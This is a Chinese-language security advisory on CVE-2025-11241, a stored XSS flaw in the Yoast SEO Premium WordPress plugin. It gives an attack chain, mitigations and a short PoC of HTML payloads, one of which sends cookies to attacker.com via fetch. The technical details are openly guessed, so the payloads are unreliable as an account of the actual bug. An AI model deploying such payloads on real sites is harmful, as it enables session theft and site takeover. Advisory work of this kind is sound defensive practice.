CVE-2025-11241：Yoast SEO Premium插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11241

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Yoast SEO Premium（WordPress插件）

漏洞概述

CVE-2025-11241是WordPress流行的SEO插件Yoast SEO Premium中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由WordPress安全公司Wordfence的安全研究人员发现并报告，CVSS评分为6.4，属于中危级别。

该漏洞存在于Yoast SEO Premium插件的25.7至25.9版本中，根本原因在于插件用于清理文章内容中某个属性的正则表达式存在缺陷。攻击者可以利用这个有缺陷的正则表达式绕过过滤机制，向文章内容中注入任意HTML属性，包括JavaScript事件处理器（如onerror、onload、onmouseover等）。

由于该漏洞为存储型XSS，恶意载荷会持久化存储在目标网站的数据库中，每当有用户访问包含恶意内容的页面时，恶意脚本就会自动执行。这使得该漏洞具有广泛的攻击面和持久性的危害。值得注意的是，该漏洞允许具有Contributor（投稿者）权限或更高权限的用户创建包含恶意JavaScript载荷的文章，这意味着即使是低权限用户也可能利用此漏洞发起攻击。

成功利用此漏洞的攻击者可以在受害者浏览器中执行任意JavaScript代码，可能导致会话劫持、cookie窃取、权限提升、恶意重定向、钓鱼攻击或其他客户端攻击。由于CVSS向量中包含S:C（Scope Changed），表明该漏洞的影响范围会超出受影响的组件本身，可能影响到整个WordPress站点及其用户。

技术细节

该漏洞的核心问题在于Yoast SEO Premium插件在处理文章内容时，使用了一个有缺陷的正则表达式来移除某个特定的HTML属性。攻击者可以通过构造特殊的HTML标签内容，绕过该正则表达式的匹配逻辑，从而保留恶意属性。

具体技术原理如下：

1. 插件在保存或显示文章内容时，会尝试通过正则表达式移除某个不需要的HTML属性（可能是class、style或其他属性）。

2. 该正则表达式存在缺陷，可能存在以下问题之一：
- 正则表达式未正确处理多行内容
- 正则表达式对属性值的引号处理不当
- 正则表达式可以被嵌套标签结构绕过

3. 攻击者可以构造如下形式的恶意载荷：
- 在HTML标签中注入额外的属性，如`onerror`、`onclick`、`onmouseover`等事件处理器
- 利用正则表达式的贪婪/非贪婪匹配缺陷，在被过滤的属性中嵌入恶意属性

4. 当其他用户（特别是管理员）查看包含恶意内容的文章时，浏览器会解析并执行嵌入的JavaScript代码。

5. 由于该漏洞需要Contributor权限及以上才能利用，攻击链通常包括：
- 攻击者注册WordPress站点或获取低权限账户
- 创建包含恶意XSS载荷的文章并提交
- 等待管理员审核或查看该文章
- 管理员的浏览器执行恶意脚本，攻击者获取管理员权限或窃取敏感信息

该漏洞已在Yoast SEO Premium 26.0版本中修复，开发者改进了正则表达式的逻辑，正确处理了各种边界情况。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者在目标WordPress站点注册账户，或通过其他方式获取Contributor（投稿者）级别或更高的访问权限。

STEP 2

步骤2：构造恶意载荷

攻击者利用Yoast SEO Premium插件中有缺陷的正则表达式过滤逻辑，构造包含恶意JavaScript事件处理器（如onerror、onload、onmouseover等）的HTML内容。

STEP 3

步骤3：提交恶意文章

攻击者创建一篇新的文章或页面，将构造好的XSS载荷嵌入文章内容中并提交保存。由于是存储型XSS，恶意载荷会被持久化存储在数据库中。

STEP 4

步骤4：等待受害者访问

恶意文章等待管理员审核、发布或普通用户访问。一旦有用户查看该页面，浏览器将解析并执行嵌入的恶意JavaScript代码。

STEP 5

步骤5：执行恶意操作

恶意脚本在受害者浏览器中执行，攻击者可以窃取cookie、会话令牌，进行权限提升（如创建管理员账户），发起钓鱼攻击，或进一步入侵WordPress站点。

STEP 6

步骤6：影响扩散

由于漏洞影响范围为Changed（CVSS中S:C），攻击者获取的权限可以影响到整个WordPress站点，包括其他用户数据和站点管理功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11241 PoC: Yoast SEO Premium Stored XSS via flawed regex -->
<!-- The vulnerability exists in versions 25.7 to 25.9 -->
<!-- The plugin uses a flawed regex to strip a specific attribute from post content -->
<!-- By crafting nested or specially formatted HTML, attackers can bypass the filter -->

<!-- Example 1: Bypass via nested attribute injection -->
<p title="innocent" onmouseover="alert(document.cookie)">Hover me</p>

<!-- Example 2: Exploiting regex limitation with crafted attribute -->
<img src="x" alt="test\" onerror=\"alert('XSS-CVE-2025-11241')\" data-x="">

<!-- Example 3: Using the attribute that the regex tries to remove -->
<!-- The regex may try to remove a specific attribute but can be bypassed -->
<div class="legit\" onload=\"fetch('https://attacker.com/steal?c='+document.cookie)\" data-class="">Content</div>

<!-- As a Contributor-level user, create a post with the above payload -->
<!-- When an admin or other user views the post, the JavaScript executes -->

影响范围

Yoast SEO Premium >= 25.7

Yoast SEO Premium < 26.0

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）限制Contributor级别及以上用户的文章发布权限，要求所有文章必须经过管理员审核；2）在WordPress中安装安全防护插件（如Wordfence），启用XSS过滤规则；3）通过.htaccess或Web服务器配置添加内容安全策略（CSP）头，限制内联脚本执行；4）暂时禁用Yoast SEO Premium插件的相关内容处理功能；5）监控站点日志，查找异常的HTML属性注入活动；6）降低用户权限，将不必要的Contributor账户降级为Subscriber级别。